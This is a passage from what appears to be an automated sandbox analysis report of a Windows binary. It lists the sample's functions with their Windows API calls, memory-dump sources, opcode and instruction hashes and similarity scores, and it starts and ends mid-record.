                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$AllocateHeapInfo
                                                    • String ID:
                                                    • API String ID: 1443698708-0
                                                    • Opcode ID: 92c578bed20eed96db78bb60753fda7402f082a0e95380a17b4b6c4bb082d00e
                                                    • Instruction ID: 281593c18ee2316b470f551aa511336bc7ffff6c6c50d26349b4ad1f0f023ae3
                                                    • Opcode Fuzzy Hash: 92c578bed20eed96db78bb60753fda7402f082a0e95380a17b4b6c4bb082d00e
                                                    • Instruction Fuzzy Hash: B881C2F290021DAFDF229FA4DD919FFBBB9EF09360B15012AF658EB251D7219C048761
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043EE69, Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0043EF1B
                                                    • GetProcessIoCounters.KERNEL32 ref: 0043EF4B
                                                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0043F07E
                                                    • CloseHandle.KERNEL32(?), ref: 0043F0FF
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                    • String ID:
                                                    • API String ID: 2364364464-0
                                                    • Opcode ID: 012502cd9df5f58cb970f1728b6884d718f8727d256c442d9c7993f52da72c3e
                                                    • Instruction ID: 288fadc6fe26cffbd7556261d47382ace6935d6ae7154cf6c68043eab7437f6f
                                                    • Opcode Fuzzy Hash: 012502cd9df5f58cb970f1728b6884d718f8727d256c442d9c7993f52da72c3e
                                                    • Instruction Fuzzy Hash: 8081A3756007009FD721DF29C886F6BB7E5AF48720F05882EF999DB392DBB4AD048B45
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003ED812, Relevance: 7.7, APIs: 5, Instructions: 236COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 003E9E4B: EnterCriticalSection.KERNEL32(?,?,003E9CBC,0000000D), ref: 003E9E76
                                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 003ED84C
                                                    • GetStartupInfoW.KERNEL32(?,0047BF10,00000064,003E7F27,0047BD38,00000014), ref: 003ED8A5
                                                    • GetFileType.KERNEL32 ref: 003ED939
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: CallCriticalEnterFileFilterFunc@8InfoSectionStartupType
                                                    • String ID:
                                                    • API String ID: 2341069899-0
                                                    • Opcode ID: 2f0ff5b43d3d8980693f2a913dca72c143e1705ec01da794fd3e1167e82eb4e2
                                                    • Instruction ID: d50e4657f7cd0eeadbe3964beaffad574c70930f411f698e453f512b25ea986f
                                                    • Opcode Fuzzy Hash: 2f0ff5b43d3d8980693f2a913dca72c143e1705ec01da794fd3e1167e82eb4e2
                                                    • Instruction Fuzzy Hash: 209116B1D042A58EDB11CF6ADC415AEBBF4EF06324B24477EE4A6AB3D1D7349902CB14
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041F3DD, Relevance: 7.7, APIs: 5, Instructions: 163COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 0041F3F7
                                                    • VariantClear.OLEAUT32(00000013), ref: 0041F469
                                                    • VariantClear.OLEAUT32(00000000), ref: 0041F4C4
                                                    • VariantClear.OLEAUT32(?), ref: 0041F53B
                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0041F569
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Variant$Clear$ChangeInitType
                                                    • String ID:
                                                    • API String ID: 4136290138-0
                                                    • Opcode ID: 081419cc11abeda3cf16fd39e6fb640e6983db758dc4d1fad379cb7a0bab5f4d
                                                    • Instruction ID: dc71ded45f6c0ef68155faf323d36f6cd4918f10be37c1909971fde169ccbfbf
                                                    • Opcode Fuzzy Hash: 081419cc11abeda3cf16fd39e6fb640e6983db758dc4d1fad379cb7a0bab5f4d
                                                    • Instruction Fuzzy Hash: 4F5188B5A00209EFCB10CF58D880EAAB7F9FF48354B15856AE949DB301D734E946CFA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043DBDC, Relevance: 7.6, APIs: 5, Instructions: 148libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0043DC3B
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0043DCBE
                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0043DCDA
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0043DD1B
                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0043DD35
                                                      • Part of subcall function 003C5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,80020004,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00427B20,00000000,80020004,00000000), ref: 003C5B8C
                                                      • Part of subcall function 003C5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,80020004,?,00000000,80020004,00000000,00000000,00000001,?,00427B20,00000000,80020004,00000000,?,00000001), ref: 003C5BB0
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                    • String ID:
                                                    • API String ID: 666041331-0
                                                    • Opcode ID: 67f2576fbd71807026830536dace74d04a663ef2a8366ab5b08dadb6b61cc960
                                                    • Instruction ID: 583cc8f11f4316abf625c9a52aaaac6015c16e88fbafdd4d51c049e9c6a878de
                                                    • Opcode Fuzzy Hash: 67f2576fbd71807026830536dace74d04a663ef2a8366ab5b08dadb6b61cc960
                                                    • Instruction Fuzzy Hash: FF513975A00205EFDB01EFA8D884DAEB7B8FF19320B15C06AE819AB311DB35AD45CB55
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004402C2, Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 004410A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00440038,?,?), ref: 004410BC
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00440388
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004403C7
                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0044040E
                                                    • RegCloseKey.ADVAPI32(?,?), ref: 0044043A
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00440447
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                    • String ID:
                                                    • API String ID: 3740051246-0
                                                    • Opcode ID: d0d6cf1d9cf64c978a36f142cbb8db85ede014dd98b97250ba3a502529c574bb
                                                    • Instruction ID: 0c62699c37d10a806f1919f9a67a006f7f7badaacc2d190d39e1a396abf13c48
                                                    • Opcode Fuzzy Hash: d0d6cf1d9cf64c978a36f142cbb8db85ede014dd98b97250ba3a502529c574bb
                                                    • Instruction Fuzzy Hash: F8513A31208204AFE705EF64D885F6EB7E8FF84704F04892EB6958B2A1DB35ED15CB56
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004226F9, Relevance: 7.6, APIs: 5, Instructions: 143windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00422792
                                                    • IsMenu.USER32 ref: 004227B2
                                                    • CreatePopupMenu.USER32(00486890,?,774233D0), ref: 004227E6
                                                    • GetMenuItemCount.USER32 ref: 00422844
                                                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00422875
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                    • String ID:
                                                    • API String ID: 93392585-0
                                                    • Opcode ID: 718fef36ee6af2b1fc58c42683376cb6e6065240d88ee91fcff46a671d078dbe
                                                    • Instruction ID: c873bc007251f21b7fcc3601835f10521faba0530603869dfabbb929cadffbd6
                                                    • Opcode Fuzzy Hash: 718fef36ee6af2b1fc58c42683376cb6e6065240d88ee91fcff46a671d078dbe
                                                    • Instruction Fuzzy Hash: 8551C270A00269FFDB24DF64EA88AAEBBF4EF45314F50462AE41197291D7B8C904CB59
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042E7DC, Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetPrivateProfileSectionW.KERNEL32 ref: 0042E88A
                                                    • GetPrivateProfileSectionW.KERNEL32 ref: 0042E8B3
                                                    • WritePrivateProfileSectionW.KERNEL32 ref: 0042E8F2
                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0042E917
                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0042E91F
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: PrivateProfile$SectionWrite$String
                                                    • String ID:
                                                    • API String ID: 2832842796-0
                                                    • Opcode ID: c83d43ce7ed66b1d32544d6d5559ce3d26f855b4bdb6187b2b4688968e20696d
                                                    • Instruction ID: fb7873dde977faf47ef92a09970de033eaee391fe915eda684281c131f0a0fff
                                                    • Opcode Fuzzy Hash: c83d43ce7ed66b1d32544d6d5559ce3d26f855b4bdb6187b2b4688968e20696d
                                                    • Instruction Fuzzy Hash: C1512739A00215DFCF01EF65D985EAEBBF5EF08310B1580AAE849AB361CB31ED51CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003F48B3, Relevance: 7.6, APIs: 5, Instructions: 133COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,?,00000000,?,?,?,?,?), ref: 003F4948
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0043C3D7,?), ref: 003F4956
                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,?,?,?,?,?,?,0043C3D7), ref: 003F49A9
                                                    • _strlen.LIBCMT ref: 003F49CE
                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,00000000,?,?,?,00000000,?,?,?,?,?), ref: 003F49E4
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$ErrorLast_strlen
                                                    • String ID:
                                                    • API String ID: 1602738612-0
                                                    • Opcode ID: 32cff595deedd6d573649234e19c0e13f3f107f0e593c38274e77b1bc3aa3d2a
                                                    • Instruction ID: 6ad6eda6d46b3fdf50ad9e5c3fd9cd03e98091af925f33e9c5d0ef83d7d6e3c1
                                                    • Opcode Fuzzy Hash: 32cff595deedd6d573649234e19c0e13f3f107f0e593c38274e77b1bc3aa3d2a
                                                    • Instruction Fuzzy Hash: 7841B63160026EAFDB239F69CD45BBB7BA8EF42360F220265F555A71E1DB708D40C761
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0044A2C5, Relevance: 7.6, APIs: 5, Instructions: 132COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 14a85214d78b2f012d2381f090569c9a33b43cd327e49c805f56e3e93633e410
                                                    • Instruction ID: a56faa6a900d19b48c270ce4f5f2fd891c9f64ce643e4f79f66a5cf16d164216
                                                    • Opcode Fuzzy Hash: 14a85214d78b2f012d2381f090569c9a33b43cd327e49c805f56e3e93633e410
                                                    • Instruction Fuzzy Hash: 20412835940104AFE710DF28CC48FAABB64FB05350F054126FC15A73D1E7349D61CA5A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C2344, Relevance: 7.6, APIs: 5, Instructions: 117keyboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCursorPos.USER32(?,?,004867B0,?,004867B0,004867B0,?,0044C247,00000000,00000001,?,?,?,003FBC4F,?,?), ref: 003C2357
                                                    • ScreenToClient.USER32 ref: 003C2374
                                                    • GetAsyncKeyState.USER32(00000001), ref: 003C2399
                                                    • GetAsyncKeyState.USER32(00000002), ref: 003C23A7
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: AsyncState$ClientCursorScreen
                                                    • String ID:
                                                    • API String ID: 4210589936-0
                                                    • Opcode ID: 40a04c9906b79df3d3de5675aaf916f85f6bfa1ab76d8a68d69ecb0fc0c2cad1
                                                    • Instruction ID: d70f96c1cae8ead156a16a1da8961cd4dd8e3ffd0e4961bf56874218a7a0f736
                                                    • Opcode Fuzzy Hash: 40a04c9906b79df3d3de5675aaf916f85f6bfa1ab76d8a68d69ecb0fc0c2cad1
                                                    • Instruction Fuzzy Hash: C5417B75508159FBDF169FA4DC44EEABB78FB05324F20431AF924E21A0CB35A990DBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00416920, Relevance: 7.6, APIs: 5, Instructions: 100windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                    • String ID:
                                                    • API String ID: 2108273632-0
                                                    • Opcode ID: 4274e7ad1563bbb407872afae0bfe0791fa12da6a644f475dee9dc5326a278f7
                                                    • Instruction ID: 67372229140eaecb952c00485719743ba15a21205420d1558707f0c297e4ec11
                                                    • Opcode Fuzzy Hash: 4274e7ad1563bbb407872afae0bfe0791fa12da6a644f475dee9dc5326a278f7
                                                    • Instruction Fuzzy Hash: F131F4B1610142ABDB609F74DC48FFB7BACAB02344F1645BBE025C2160D339D4CAD7A8
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00418F01, Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetWindowRect.USER32 ref: 00418F12
                                                    • PostMessageW.USER32(?,00000201,?,00000000), ref: 00418FBC
                                                    • Sleep.KERNEL32(00000000), ref: 00418FC4
                                                    • PostMessageW.USER32(?,00000202,00000000,00000000), ref: 00418FD2
                                                    • Sleep.KERNEL32(00000000), ref: 00418FDA
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: MessagePostSleep$RectWindow
                                                    • String ID:
                                                    • API String ID: 3382505437-0
                                                    • Opcode ID: 81fb4389d1bd9ad589d67105d9ba23b6b31099ee247d9b08c8f28244730c641d
                                                    • Instruction ID: 41e10e805f1fc8a7de2e33d9257a783c9fe83fc166149f7cb7ac60bbec16fcc9
                                                    • Opcode Fuzzy Hash: 81fb4389d1bd9ad589d67105d9ba23b6b31099ee247d9b08c8f28244730c641d
                                                    • Instruction Fuzzy Hash: B331FF72500219EFDF00CF68DD4CAEF3BBAEB41326F10422AF924AA2D0C7B49955CB55
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0044B405, Relevance: 7.6, APIs: 5, Instructions: 87COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 003C2612: GetWindowLongW.USER32(?,000000EB), ref: 003C2623
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0044B44C
                                                    • SetWindowLongW.USER32 ref: 0044B471
                                                    • SetWindowLongW.USER32 ref: 0044B489
                                                    • GetSystemMetrics.USER32 ref: 0044B4B2
                                                    • SetWindowPos.USER32(00000000,00C00000,00C00000,00C00000,00C00000,00C00000,00000047,?,?,?,?,?,?,?,00431184,00000000), ref: 0044B4D0
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Window$Long$MetricsSystem
                                                    • String ID:
                                                    • API String ID: 2294984445-0
                                                    • Opcode ID: 35d9f2b6a79443fa83502e11f35739db27ca3efad6d005949c61d2c54f1657fb
                                                    • Instruction ID: 2e8fe5365841c5eef0d8fd7f408575965bc7a7e363b727480c27e4fb6cee0d1b
                                                    • Opcode Fuzzy Hash: 35d9f2b6a79443fa83502e11f35739db27ca3efad6d005949c61d2c54f1657fb
                                                    • Instruction Fuzzy Hash: 1E219F71900225AFDB109F38DC08A6A7BA4EB05325F114B3AF926D22E2E734D911CB98
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00435D60, Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Window$ForegroundPixelRelease
                                                    • String ID:
                                                    • API String ID: 4156661090-0
                                                    • Opcode ID: f2136da51614b2013a0b9abacc2fa0747c61f4daa9d61b3d62f64425f41a6f3f
                                                    • Instruction ID: 0a5f1d6c5e546fcc3868be86f9e4004901ced039e3e7c5799987803154f8f929
                                                    • Opcode Fuzzy Hash: f2136da51614b2013a0b9abacc2fa0747c61f4daa9d61b3d62f64425f41a6f3f
                                                    • Instruction Fuzzy Hash: DE219F79A00104AFD714EF65C888BAEB7E9EF49300F05847EE809D7261CA34AD45CB54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C12F3, Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 003C134D
                                                    • SelectObject.GDI32(?,00000000), ref: 003C135C
                                                    • BeginPath.GDI32(?), ref: 003C1373
                                                    • SelectObject.GDI32(?,00000000), ref: 003C139C
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: ObjectSelect$BeginCreatePath
                                                    • String ID:
                                                    • API String ID: 3225163088-0
                                                    • Opcode ID: 007db991fe9207d18908b23e0f1a36c2facab85d8e27936557c0a6726256abc5
                                                    • Instruction ID: e41377032fa2549ada7e45a69170d08433496e51c701d7a47e4fb45d2bfaf51b
                                                    • Opcode Fuzzy Hash: 007db991fe9207d18908b23e0f1a36c2facab85d8e27936557c0a6726256abc5
                                                    • Instruction Fuzzy Hash: 4B21D675801248EFDB029F65DC08BAD7BB8F702365F128A3EF414D64A1C3719C95EB58
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00417652, Relevance: 7.6, APIs: 5, Instructions: 54stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001), ref: 0041766F
                                                    • ProgIDFromCLSID.OLE32(00000000,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001), ref: 0041768A
                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001), ref: 00417698
                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001), ref: 004176A8
                                                    • CLSIDFromString.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001), ref: 004176B4
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                    • String ID:
                                                    • API String ID: 3897988419-0
                                                    • Opcode ID: 322713ba80005ec90bc9a2e432f3b950c7b23e8dff796427b9a943c149bfac8b
                                                    • Instruction ID: 89018be6dedc7fc0f5a1fa99dd17ff1f9ccc444016aad5624ec0cd2180daf6f3
                                                    • Opcode Fuzzy Hash: 322713ba80005ec90bc9a2e432f3b950c7b23e8dff796427b9a943c149bfac8b
                                                    • Instruction Fuzzy Hash: 0A015EB7604508BFEB105F94EC44EEB7BBCEB467A5F10002AF904D6114D7369D8596B8
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041874A, Relevance: 7.6, APIs: 5, Instructions: 51memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetUserObjectSecurity.USER32(?,00000004,?,?,?), ref: 00418766
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00418427,?,?,?), ref: 00418770
                                                    • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,00418427,?,?,?), ref: 0041877F
                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,00418427,?,?,?), ref: 00418786
                                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0041879D
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
